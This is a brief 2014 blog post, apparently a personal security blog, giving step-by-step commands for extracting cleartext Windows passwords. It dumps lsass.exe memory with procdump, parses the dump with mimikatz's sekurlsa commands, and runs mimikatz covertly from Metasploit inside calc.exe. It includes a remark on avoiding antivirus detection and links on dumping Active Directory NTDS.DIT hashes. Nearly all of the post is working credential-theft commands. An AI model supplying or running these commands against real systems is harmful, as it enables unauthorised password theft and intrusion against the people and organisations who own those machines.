Saturday, October 11, 2014

Get passwords from Lsass.exe dump

Benjamin Delpy found that the windows process lsass.exe stores password in memory in a reversible way.
Then he developed a great tool called "mimikatz" - the next lines are some steps to get some cleartext passwords

Use "procdump" a tool from (Russinovich) Microsoft to dump the memory of the lsass.exe process
(download http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx)

> procdump -accepteula -ma lsass.exe lsass.dmp

run mimikatz and use debug mode
> privilege::debug

use minidump mode and load the lsass.dmp 
> sekurlsa::minidump lsass.dmp

Another way is to run mimikatz in runtime, but it is not stealthy (some AV flag it)
Run mimkatz in debug mode
> privilege::debug

get passwords in memory
> sekurlsa::logonPasswords

You can use Mimikatz in Metasploit too
execute -H -i -c -m -d calc.exe -f /root/mimi/Win32/mimikatz.exe -a  '"sekurlsa::logonPasswords full" exit'  

Thanks: (the great Benjamim Delpy)
http://blog.gentilkiwi.com/securite/mimikatz/minidump
http://blog.opensecurityresearch.com/2012/06/using-mimikatz-to-dump-passwords.html 


Another interesting vector is getting hashes from NTDS.DIT (active directory database)

http://blog.spiderlabs.com/2013/11/tutorial-for-ntds-goodness-vssadmin-wmis-ntdsdit-system-.html
http://neobits.org/extracting-ntds-dit-from-a-live-domain-controller-the-easy-way/
http://bernardodamele.blogspot.pt/2011/12/dump-windows-password-hashes_16.html
https://www.securusglobal.com/community/2013/12/20/dumping-windows-credentials/

No comments: